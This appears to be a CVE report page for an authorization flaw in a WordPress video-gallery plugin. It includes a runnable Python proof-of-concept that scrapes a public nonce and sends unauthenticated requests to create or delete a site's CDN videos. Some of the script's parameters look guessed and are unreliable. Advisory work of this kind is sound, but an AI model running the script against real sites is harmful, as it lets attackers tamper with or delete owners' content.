Security Vulnerability Report
CVE-2025-14947 CVSS 6.5 MEDIUM

Published: 2026-01-23 18:16:02
Last Modified: 2026-04-15 00:35:42

Description

The All-in-One Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `ajax_callback_create_bunny_stream_video`, `ajax_callback_get_bunny_stream_video`, and `ajax_callback_delete_bunny_stream_video` functions in all versions up to, and including, 4.6.4. This makes it possible for unauthenticated attackers to create and delete videos on the Bunny Stream CDN associated with the victim's account, provided they can obtain a valid nonce which is exposed in public player templates.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

All-in-One Video Gallery <= 4.6.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import argparse
import re

import requests


def exploit_cve_2025_14947(target_url, action='delete'):
    """
    CVE-2025-14947 PoC - All-in-One Video Gallery Unauthorized Video Manipulation

    This exploit demonstrates the missing authorization (CWE-862) vulnerability
    in the All-in-One Video Gallery plugin, where AJAX functions lack proper
    capability checks.

    Actions: 'create', 'get', 'delete'
    """
    # Step 1: Extract nonce from public player template
    player_url = f"{target_url}/?aivg_id=1"

    try:
        response = requests.get(player_url, timeout=10)
        # Extract nonce from player template (typically in data-nonce attribute)
        nonce_match = re.search(r'data-nonce="([a-zA-Z0-9]+)"', response.text)
        if not nonce_match:
            print("[-] Failed to extract nonce from player template")
            return False
        nonce = nonce_match.group(1)
        print(f"[+] Extracted nonce: {nonce}")
    except requests.RequestException as e:
        print(f"[-] Error fetching player page: {e}")
        return False

    # Step 2: Prepare AJAX request
    ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest'
    }

    if action == 'create':
        # Create video on Bunny Stream CDN
        data = {
            'action': 'ajax_callback_create_bunny_stream_video',
            'nonce': nonce,
            'video_title': 'Malicious Video',
            'video_guid': 'malicious-video-guid'
        }
    elif action == 'get':
        # Get video information
        data = {
            'action': 'ajax_callback_get_bunny_stream_video',
            'nonce': nonce,
            'video_id': '1'
        }
    elif action == 'delete':
        # Delete video from Bunny Stream CDN
        data = {
            'action': 'ajax_callback_delete_bunny_stream_video',
            'nonce': nonce,
            'video_id': '1'
        }
    else:
        print("[-] Invalid action")
        return False

    # Step 3: Execute malicious request (no authentication required)
    try:
        response = requests.post(ajax_endpoint, data=data, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] {action.upper()} action completed successfully")
            print(f"[+] Response: {response.text[:500]}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.RequestException as e:
        print(f"[-] Error executing request: {e}")
        return False


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-14947 Exploit')
    parser.add_argument('--url', required=True, help='Target WordPress URL')
    parser.add_argument('--action', choices=['create', 'get', 'delete'],
                        default='delete', help='Action to perform')
    args = parser.parse_args()
    exploit_cve_2025_14947(args.url, args.action)
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14947",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-23T18:16:02.070",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The All-in-One Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `ajax_callback_create_bunny_stream_video`, `ajax_callback_get_bunny_stream_video`, and `ajax_callback_delete_bunny_stream_video` functions in all versions up to, and including, 4.6.4. This makes it possible for unauthenticated attackers to create and delete videos on the Bunny Stream CDN associated with the victim's account, provided they can obtain a valid nonce which is exposed in public player templates."
      },
      {
        "lang": "es",
        "value": "El plugin All-in-One Video Gallery para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en las funciones 'ajax_callback_create_bunny_stream_video', 'ajax_callback_get_bunny_stream_video' y 'ajax_callback_delete_bunny_stream_video' en todas las versiones hasta la 4.6.4, inclusive. Esto hace posible que atacantes no autenticados creen y eliminen videos en la CDN de Bunny Stream asociada con la cuenta de la víctima, siempre que puedan obtener un nonce válido que se expone en las plantillas públicas del reproductor."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/includes/init.php#L373",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/bunny-stream.php#L131",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/bunny-stream.php#L285",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3441541/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bedfb712-faf6-4131-b254-e6d7c367f49f?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```